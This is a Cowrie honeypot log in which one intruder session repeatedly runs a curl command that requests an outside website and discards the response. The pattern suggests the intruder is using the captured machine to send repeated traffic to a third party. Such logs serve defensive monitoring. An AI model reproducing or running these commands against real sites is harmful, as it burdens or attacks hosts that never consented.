{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.113827Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.150376Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.151457Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.188177Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.189396Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.228477Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.229424Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.266120Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.267064Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.315482Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.316552Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.357606Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.358610Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.402374Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.403319Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.446342Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.447242Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.483995Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.484927Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.521705Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.522679Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.560850Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.561729Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.598622Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.599350Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.669427Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.670309Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.708787Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.709674Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.747472Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.748552Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.810034Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.810952Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.849626Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.850556Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.888666Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.889528Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.936332Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.937290Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.035334Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.036215Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.089114Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.090146Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.128284Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.129171Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.173557Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.174413Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.210650Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.211481Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.247688Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.248568Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.285728Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.286577Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.429278Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.430120Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.475715Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.476639Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.514341Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.515180Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.551744Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.552580Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.588637Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.589430Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.626312Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.627064Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.668128Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.669022Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.705716Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.706539Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.751967Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.752859Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.804448Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.805336Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.847549Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.848503Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.886887Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.887827Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.924483Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.925473Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:05.968864Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:05.969796Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.012313Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.013441Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.062815Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.063900Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.110920Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.111803Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.149436Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.150307Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.188547Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.189461Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.226457Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.227554Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.268259Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.269168Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.310386Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.311399Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.348575Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.350207Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.387207Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.388162Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.425772Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.426861Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.463927Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.465037Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.579797Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.580654Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.621212Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.622010Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.658404Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.659494Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.719744Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.720567Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.759951Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.760745Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.797035Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.798069Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.849100Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.849931Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.886768Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.887637Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.924164Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.925371Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:06.983278Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:06.984170Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.026789Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.027791Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.082203Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.083430Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
